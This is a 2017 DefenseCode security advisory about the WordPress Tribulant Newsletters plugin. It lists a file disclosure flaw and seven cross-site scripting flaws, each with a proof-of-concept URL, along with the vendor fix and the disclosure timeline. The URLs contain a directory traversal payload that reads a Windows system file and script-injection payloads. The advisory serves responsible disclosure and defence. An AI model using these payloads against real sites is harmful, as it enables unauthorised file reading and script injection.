1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
DefenseCode WebScanner DAST Advisory WordPress Tribulant Newsletters Plugin Multiple Security Vulnerabilities Advisory ID:DC-2017-01-012 Advisory Title: WordPress Tribulant Newsletters Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress Tribulant Newsletters Plugin Language: PHP Version:4.6.4.2 and below Vendor Status:Vendor contacted, update released Release Date: 2017/05/29 Risk: Medium 1. General Overview =================== During the security audit of Tribulant Newsletters plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode WebScanner application security analysis platform. More information about WebScanner is available at URL: http://www.defensecode.com 2. Software Overview ==================== According to the authors, WordPress Tribulant Newsletters plugin is a full-featured newsletter plugin for WordPress which fulfils all subscribers, emails, marketing and newsletter related needs for both personal and business environments. According to wordpress.org, it has more than 9,000 active installs. Homepage: <blockquote class="wp-embedded-content" data-secret="SiT4GpumM0"><a href="https://wordpress.org/plugins/newsletters-lite/" target="_blank"rel="external nofollow" class="external" >Newsletters</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Newsletters” — Plugin Directory" src="https://wordpress.org/plugins/newsletters-lite/embed/#?secret=HnseZkZbtE#?secret=SiT4GpumM0" data-secret="SiT4GpumM0" frameborder="0" marginmarginscrolling="no"></iframe> http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin 3. Vulnerability Description ================================== During the security analysis, WebScanner discovered File Disclosure vulnerability and multiple Cross Site Scripting vulnerabilities in Tribulant Newsletters plugin. 3.1 File Disclosure ---- Input:$_GET['file'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini 3.2 Cross-Site Scripting ---- Input:$_GET['method'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E 3.3 Cross-Site Scripting ---- Input:$_GET['id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start 3.4 Cross-Site Scripting ---- Input:$_GET['id'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E 3.5 Cross-Site Scripting ---- Input:$_GET['value'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script> 3.6 Cross-Site Scripting ---- Input:$_GET['order'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E 3.7 Cross-Site Scripting ---- Input:$_GET['wpmlsearchterm'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E 3.8 Cross-Site Scripting ---- Input:$_GET['wpmlmessage'] Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E 4. Solution =========== Vendor resolved the security issues after we reported the vulnerabilities. All users are strongly advised to update WordPress Tribulant Newsletters plugin to the latest available version. 5. Credits ========== Discovered with DefenseCode WebScanner security analyzer by Neven Biruski. 6. Disclosure Timeline ====================== 2017/04/04Vendor contacted 2017/04/06Vendor responded, update released 2017/05/29Advisory released to the public 7. About DefenseCode ==================== DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop and mobile applications for security vulnerabilities. DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing) solution for performing extensive security audits of application source code. ThunderScan SAST performs fast and accurate analyses of large and complex source code projects delivering precise results and low false positive rate. DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing) solution for comprehensive security audits of active web applications. WebScanner will test a website's security by carrying out a large number of attacks using the most advanced techniques, just as a real attacker would. Subscribe for free software trial on our website http://www.defensecode.com/ . E-mail: defensecode[at]defensecode.com Website: http://www.defensecode.com Twitter: https://twitter.com/DefenseCode/ |